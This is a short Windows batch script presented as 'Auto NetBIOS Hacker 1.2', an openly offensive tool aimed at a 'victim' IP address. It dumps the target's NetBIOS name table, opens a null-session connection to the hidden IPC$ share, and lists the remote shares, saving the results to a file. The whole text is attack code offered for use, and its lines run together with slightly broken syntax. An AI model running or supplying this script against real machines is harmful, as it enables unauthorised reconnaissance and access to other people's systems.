cls @echo off echo Auto NetBIOS Hacker 1.2 for Windows 95/98/NT - By Neon-Lenz echo ----------------------------------------------------------- echo How to use Auto NetBIOS Hacker: netbios "ipofvictim" echo This little proggie will get you the NetBIOS name-table echo of the target, a connection to the target's hidden IPC$ echo null share and the available remote shares of the target. echo The results are automatically saved into result.txt, it echo should be in the directory where you have put netbios.bat. echo Neon-Lenz - neonlenz@ellicit.org nbtstat -a %1 > result.txt net use \\%1\ipc$ " /user:" >> result.txt net view \\%1 >>> result.txt